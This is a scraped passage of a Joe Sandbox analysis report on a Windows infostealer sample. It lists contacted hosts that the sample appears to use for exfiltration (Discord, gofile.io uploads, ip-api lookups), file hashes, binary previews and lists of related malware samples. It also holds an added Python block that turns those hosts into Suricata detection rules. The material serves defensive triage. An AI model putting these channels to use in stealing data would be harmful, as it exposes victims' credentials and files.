                                                                                                                                                      https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_syrename_me_before.exe, 00000001.00000003.1965401133.000001B17E4F0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966237596.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1981201596.000001B17E536000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1667996233.000001B17E531000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668933285.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669358961.000001B17E510000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670306810.000001B17E523000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1668055844.000001B17E535000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1669127853.000001B17E528000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://twitter.com/homePrename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://docs.python.org/3/library/multiprocessing.htmlrename_me_before.exe, 00000001.00000003.1970570414.000001B100618000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971203694.000001B10061B000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965506103.000001B1005D5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1675049880.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1966055870.000001B100617000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1975666963.000001B10061C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1677223508.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1673647231.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1671664245.000001B100613000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965777162.000001B1005E8000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1670798799.000001B100615000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1965048386.000001B10058E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/python-attrs/attrs/issues/1165)rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://gofile.io/d/ukhEgsrename_me_before.exe, 00000001.00000003.1964419181.000001B102D12000.00000004.00000020.00020000.00000000.sdmpfalse
  Reputation: high
URL: https://tidelift.com/subscription/pkg/pypi-attrs?utm_source=pypi-attrs&utm_medium=referral&utm_campa
  Source: METADATA.0.dr
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://open.spotify.com/user/P
  Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://www.attrs.org/en/stable/changelog.html
  Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr
  Malicious: false
  Reputation: high
URL: https://cryptography.io/en/latest/security/
  Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr
  Malicious: false
  Reputation: high
URL: https://github.com/python-attrs/attrs/issues/1141)
  Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr
  Malicious: false
  Reputation: high
URL: https://i.hizliresim.com/6t31tw2.jpg
  Source: rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://thumbnails.roblox.com/v1/users/avatar?userIds=
  Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://www.variomedia.de/
  Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr
  Malicious: false
  Reputation: high
URL: https://bugs.python.org/issue37179
  Source: rename_me_before.exe, 00000001.00000003.1891156202.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1947237648.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1969941981.000001B100C4C000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1971261333.000001B100CC5000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977307117.000001B100CD2000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
  Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B1033E4000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://www.reddit.com/user/
  Source: rename_me_before.exe, 00000001.00000002.1980340485.000001B103050000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1949993747.000001B101FC3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1978981334.000001B101D80000.00000004.00001000.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
  Source: rename_me_before.exe, 00000001.00000003.1965746028.000001B17E529000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
  Source: rename_me_before.exe, 00000001.00000003.1673393839.000001B100980000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://github.com/pyca/cryptography/issues
  Source: METADATA0.0.dr
  Malicious: false
  Reputation: high
URL: https://readthedocs.org/projects/cryptography/badge/?version=latest
  Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr
  Malicious: false
  Reputation: high
URL: https://t.me/ExelaStealer
  Source: rename_me_before.exe, 00000001.00000003.1966972745.000001B102228000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://www.attrs.org/
  Source: METADATA.0.dr
  Malicious: false
  Reputation: high
URL: https://github.com/python-attrs/attrs/issues/1158)
  Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr
  Malicious: false
  Reputation: high
URL: https://mahler:8092/site-updates.py
  Source: rename_me_before.exe, 00000001.00000002.1976728516.000001B1009F2000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1968294358.000001B1009F1000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B1009CC000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
  Source: rename_me_before.exe, 00000001.00000003.1719040380.000001B103473000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://github.com/python-attrs/attrs/issues/1203)
  Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661709047.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A2A0000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr
  Malicious: false
  Reputation: high
URL: https://www.attrs.org/en/23.2.0/_static/sponsors/Tidelift.svg
  Source: rename_me_before.exe, 00000000.00000003.1661645674.000001CF0A292000.00000004.00000020.00020000.00000000.sdmp, METADATA.0.dr
  Malicious: false
  Antivirus detection: Avira URL Cloud: safe
  Reputation: unknown
URL: https://github.com/pyca/cryptography
  Source: rename_me_before.exe, 00000000.00000003.1662701366.000001CF0A295000.00000004.00000020.00020000.00000000.sdmp, METADATA0.0.dr
  Malicious: false
  Reputation: high
URL: https://www.python.org/download/releases/2.3/mro/.
  Source: rename_me_before.exe, 00000001.00000002.1981358821.000001B17FE20000.00000004.00001000.00020000.00000000.sdmp, base_library.zip.0.dr
  Malicious: false
  Reputation: high
URL: https://cryptography.io/
  Source: METADATA0.0.dr
  Malicious: false
  Reputation: high
URL: https://docs.python.org/3/library/asyncio-eventloop.html
  Source: rename_me_before.exe, 00000001.00000002.1977125594.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1964107785.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1953054230.000001B100C17000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000002.1977852804.000001B101140000.00000004.00001000.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1685174704.000001B100CB3000.00000004.00000020.00020000.00000000.sdmp, rename_me_before.exe, 00000001.00000003.1684873448.000001B100C48000.00000004.00000020.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
URL: https://i.hizliresim.com/eai9bwi.jpg0
  Source: rename_me_before.exe, 00000001.00000002.1978690429.000001B101D30000.00000004.00001000.00020000.00000000.sdmp
  Malicious: false
  Reputation: high
Map legend (share of contacted IPs per country): No. of IPs < 25%; 25% < No. of IPs < 50%; 50% < No. of IPs < 75%; 75% < No. of IPs

IP               Domain              Country        ASN    ASN Name         Malicious
208.95.112.1     ip-api.com          United States  53334  TUT-ASUS         false
162.159.137.232  canary.discord.com  United States  13335  CLOUDFLARENETUS  false
162.159.128.233  unknown             United States  13335  CLOUDFLARENETUS  false
45.112.123.126   api.gofile.io       Singapore      16509  AMAZON-02US      false
45.112.123.227   store1.gofile.io    Singapore      16509  AMAZON-02US      false

IP
127.0.0.1
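The contacted-host table above is what a defender usually extracts first from a report like this. The following is an added example (editor's code, not part of the Joe Sandbox report or of any Joe Sandbox tooling) that turns those rows into network indicators: it drops loopback and private addresses such as the 127.0.0.1 entry, drops hosts the sandbox's own cookbook whitelists (the "Excluded IPs / domains from analysis" lists further down the page), prefers the resolved domain over the IP, falls back to an IP-only indicator where the report shows no domain (the 162.159.128.233 row), and renders the result as Suricata rules. The host rows and exclusion lists are constructed from this page; the ASN strings are copied verbatim from the table; the rule text, SID range and the `HostRow`/`Indicator` names are the editor's own.

```python
"""Triage a sandbox report's contacted hosts into network indicators.

Added example, not code from the Joe Sandbox report. Input rows and exclusion
lists are constructed from the report's own tables; rule format is the editor's.
"""
import ipaddress
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class HostRow:
    """One row of the report's IP / Domain / Country / ASN table."""
    ip: str
    domain: Optional[str]   # None where the report shows "unknown"
    country: str
    asn: int
    asn_name: str           # verbatim from the report, e.g. "CLOUDFLARENETUS"
    malicious: bool         # the report's own "Malicious" column


# Constructed from the report's IP table plus its private-IP table entry.
REPORT_ROWS = [
    HostRow("208.95.112.1", "ip-api.com", "United States", 53334, "TUT-ASUS", False),
    HostRow("162.159.137.232", "canary.discord.com", "United States", 13335, "CLOUDFLARENETUS", False),
    HostRow("162.159.128.233", None, "United States", 13335, "CLOUDFLARENETUS", False),
    HostRow("45.112.123.126", "api.gofile.io", "Singapore", 16509, "AMAZON-02US", False),
    HostRow("45.112.123.227", "store1.gofile.io", "Singapore", 16509, "AMAZON-02US", False),
    HostRow("127.0.0.1", None, "", 0, "", False),
]

# Constructed from the cookbook's "Excluded IPs / domains from analysis (whitelisted)" lines.
SANDBOX_EXCLUDED_IPS = frozenset({
    "184.28.90.27", "20.109.210.53", "13.95.31.18", "52.149.20.212", "13.107.246.45",
})
SANDBOX_EXCLUDED_DOMAINS = frozenset({
    "fs.microsoft.com", "otelrules.azureedge.net", "slscr.update.microsoft.com",
    "ctldl.windowsupdate.com", "ocsp.digicert.com", "sls.update.microsoft.com",
})


@dataclass(frozen=True)
class Indicator:
    value: str   # domain or IP literal
    kind: str    # "domain" or "ip"
    asn: str     # "AS13335 CLOUDFLARENETUS"
    note: str


def triage(rows: Iterable[HostRow],
           excluded_ips: frozenset = SANDBOX_EXCLUDED_IPS,
           excluded_domains: frozenset = SANDBOX_EXCLUDED_DOMAINS) -> list:
    """Keep only hosts worth alerting on, preferring the domain over the IP."""
    out, seen = [], set()
    for r in rows:
        addr = ipaddress.ip_address(r.ip)
        # Loopback / RFC1918 / link-local rows are sandbox-local traffic, never an indicator.
        if addr.is_loopback or addr.is_private or addr.is_link_local:
            continue
        # Drop infrastructure the sandbox itself treats as background noise.
        if r.ip in excluded_ips or (r.domain and r.domain.lower() in excluded_domains):
            continue
        if r.domain:
            value, kind, note = r.domain.lower(), "domain", "resolved by the sample"
        else:
            # No hostname in the report: the IP is all we have, which is a weak
            # indicator on a shared ASN, so say so in the note.
            value, kind, note = r.ip, "ip", "no domain resolved; IP-only match"
        if value in seen:
            continue
        seen.add(value)
        out.append(Indicator(value, kind, f"AS{r.asn} {r.asn_name}", note))
    return out


def to_suricata(indicators: list, base_sid: int = 1000000) -> list:
    """Render indicators as Suricata rules: dns.query match for domains, IP match otherwise."""
    rules = []
    for i, ind in enumerate(indicators):
        sid = base_sid + i
        msg = f"Sandbox IOC {ind.value} ({ind.asn}; {ind.note})"
        if ind.kind == "domain":
            rules.append(f'alert dns $HOME_NET any -> any any (msg:"{msg}"; dns.query; '
                         f'content:"{ind.value}"; nocase; sid:{sid}; rev:1;)')
        else:
            rules.append(f'alert ip $HOME_NET any -> {ind.value} any (msg:"{msg}"; sid:{sid}; rev:1;)')
    return rules


if __name__ == "__main__":
    for rule in to_suricata(triage(REPORT_ROWS)):
        print(rule)
```

Running the block prints five rules: four DNS-query rules for ip-api.com, canary.discord.com, api.gofile.io and store1.gofile.io, and one IP rule for 162.159.128.233. The report marks every host "Malicious: false"; that column is the sandbox's reputation lookup, not a statement about this sample, so the example deliberately ignores it and lets the analyst decide which of the contacted hosts belong in a blocklist.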
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582938
Start date and time: 2025-01-01 02:52:08 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 78
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rename_me_before.exe
Detection: MAL
Classification: mal100.rans.spre.phis.troj.spyw.expl.evad.winEXE@130/182@4/6
EGA Information:
• Successful, ratio: 50%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 68
• Number of non-executed functions: 121
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 184.28.90.27, 20.109.210.53, 13.95.31.18, 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
• Execution Graph export aborted for target mshta.exe, PID 2108 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 1668 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtQueryVolumeInformationFile calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
20:53:00  API Interceptor  5x Sleep call for process: WMIC.exe modified
20:53:06  API Interceptor  2x Sleep call for process: svchost.exe modified
20:53:06  API Interceptor  19x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
                                                                                                                                                                                                                                      http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                      • 162.252.214.4
                                                                                                                                                                                                                                      Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                      • 208.95.112.1
Match: CLOUDFLARENETUS
https://thetollroads.com-wfmo.xyz/us | malicious | Unknown | 104.17.25.14
http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdf | malicious | Unknown | 104.16.123.96
decrypt.exe | malicious | Unknown | 104.21.16.1
decrypt.exe | malicious | Unknown | 104.21.16.1
FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 104.16.123.96
OPRfEWLTto.js | malicious | Unknown | 104.21.75.126
Loader.exe | malicious | LummaC | 172.67.157.249
ILxa85qCjP.js | malicious | Unknown | 172.67.175.217
PASS-1234.exe | malicious | LummaC | 104.21.96.1
Loader.exe | malicious | LummaC | 104.21.80.1
Match: AMAZON-02US
i.elf | malicious | Unknown | 54.171.230.55
http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdf | malicious | Unknown | 52.217.136.154
i.elf | malicious | Unknown | 54.171.230.55
allpdfpro.msi | malicious | Unknown | 143.204.98.59
FW_ Carr & Jeanne Biggerstaff has sent you an ecard.msg | malicious | Unknown | 52.59.81.109
boatnet.arm.elf | malicious | Mirai | 54.171.230.55
boatnet.mips.elf | malicious | Mirai | 34.243.160.129
over.ps1 | malicious | Vidar | 18.238.49.52
http://knoxoms.com | malicious | Unknown | 34.210.182.11
boatnet.arm6.elf | malicious | Mirai | 54.171.230.55
No context

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match: C:\Users\user\AppData\Local\Temp\_MEI13962\VCRUNTIME140.dll
PDF_Resave.exe | malicious | Unknown
phost.exe | malicious | Blank Grabber
shost.exe | malicious | Python Stealer, Muck Stealer
sppawx.exe | malicious | Blank Grabber
qhos.exe | malicious | Python Stealer, Muck Stealer
wsapx.exe | malicious | Blank Grabber
lz4wnSavmK.exe | malicious | Python Stealer
WVuXCNNYG0.exe | malicious | Python Stealer
dipwo1iToJ.exe | malicious | Python Stealer
Counseling_Services_Overview.docm | malicious | Unknown
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 1.307320057862836
Encrypted: false
SSDEEP: 3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrR:KooCEYhgYEL0In
MD5: C7CEBD9F9C39C2D63926BF6F7843C489
SHA1: ECFCE213C1B264B1BC585DFD69B976C7A1583CC2
SHA-256: 29B221D62F788128CF2ACEEDBD1A42480622324B599669A61A04BF54212F0552
SHA-512: 702BA4EAB1962B8A0338EE6F133551A671428BEABF82EE65BB8EB47B74231CC4224E7B877CC3F64BE92CF2E1E15A2C365120111AF403E76E5AE72378167DE09B
Malicious: false
                                                                                                                                                                                                                                                          Preview:z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: Extensible storage engine DataBase, version 0x620, checksum 0x0957a363, page size 16384, DirtyShutdown, Windows version 10.0
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.4220577820941714
Encrypted: false
SSDEEP: 1536:RSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Raza/vMUM2Uvz7DO
MD5: E8AE16DD0BF5EF7A966EA84CA35C00E9
SHA1: 7494B9278619852773265C881BDD71086B418311
SHA-256: C427FB24477A1AD702B67D779CBCE78E2C560A591EF8071BE881FFF2A922A1B3
SHA-512: D9D0B8C6E4671C7936AE4790C00AE4F86310FB2AEA579E13A62A501E05B288B2B00ABBBE54FE8F6FF2B1BEDB43AD23F016248C26B3918724476AD61010AD6E91
Malicious: false
                                                                                                                                                                                                                                                          Preview:.W.c... .......A.......X\...;...{......................0.!..........{A..5...}..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{.......................................5...}...................Y~..5...}...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 16384
Entropy (8bit): 0.07492417746599407
Encrypted: false
SSDEEP: 3:HvmXlKYeVHYaZajn13a/5eqa1lallcVO/lnlZMxZNQl:e1KzVHpa53q5ejAOewk
MD5: 7044A1DC53E9067555D3DBB9A7C0CD1B
SHA1: D6D2DB0A7C2671BA2C824F9EC3F2CD9066F7E5B9
SHA-256: 2E9EE533CE9F4715AE3B585A9FEA7C80B5394DBE73C7218869C1EC1B191007FD
SHA-512: 4A3C6C165776A1764B9CE3AF3B53BCA88AC6C9E9DA06A80EEDD705E4CE2BE0C8013F22F6E766B8227F03BB5716CD3F24E315D7EDB8459F6F92B06F1ECF4892A7
Malicious: false
                                                                                                                                                                                                                                                          Preview:.........................................;...{...5...}.......{A..............{A......{A..........{A].................Y~..5...}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):11803970
                                                                                                                                                                                                                                                          Entropy (8bit):7.996640205330543
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:196608:AUC1IYDEmmtSBLjv+bhqNVobZ1Uh8mAIv9P5jQ1KJEaKOlx:TC+OEZtSZL+9qzGZeII3MCCOlx
                                                                                                                                                                                                                                                          MD5:8B8040D5875E4C41ED5091F92021A16B
                                                                                                                                                                                                                                                          SHA1:4EBB7B91E64A7193B61A0E1405847ED13563F7D5
                                                                                                                                                                                                                                                          SHA-256:7E7597691235F0FF8A8DF29EE3E54EA7A69B43B4EF727ADF511E7AEC749DC68A
                                                                                                                                                                                                                                                          SHA-512:4703F8AD9543F2AA47A1C964E13C7BAD48A593284D53BAAC3581D6B584E63CAD5C88AFE6ACA2C8F2C708369E757B2CD150B95247C01BFD8B58D6915FED524A7A
                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d.....f.........."....(.....l.................@....................................G2....`.................................................l...x.......,....`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...,...........................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):64
                                                                                                                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Preview:@...e...........................................................
                                                                                                                                                                                                                                                          Process:C:\Users\user\Desktop\rename_me_before.exe
                                                                                                                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):707602
                                                                                                                                                                                                                                                          Entropy (8bit):7.99764650582294
                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                          SSDEEP:12288:gJWrGSn7dWcSbn2gknkvx7XStuv+BETpx76W0VRZPGrM+4J1shI1+4uzFNxdDoQV:dSSJnYn+kvxj6uLTpx76W06Mvh4HftoA
                                                                                                                                                                                                                                                          MD5:9BBFF0760B442F12594437173F36EE9F
                                                                                                                                                                                                                                                          SHA1:F45BD39C8DB3F3A4433A1620860781860A5E161A
                                                                                                                                                                                                                                                          SHA-256:855153C6E19409BECEF9A7CB2B80E60400D373AAE9ABA4A440A78020FE6A6B64
                                                                                                                                                                                                                                                          SHA-512:7C57D7BF5E1EE5052B8B120B46AD4FAF2F4FA468407AC749447C618E450A65209925D823170F9B44801E9534083AF3B04CE1D75EF5F16943B9825A125B2E26CD
                                                                                                                                                                                                                                                          Malicious:false
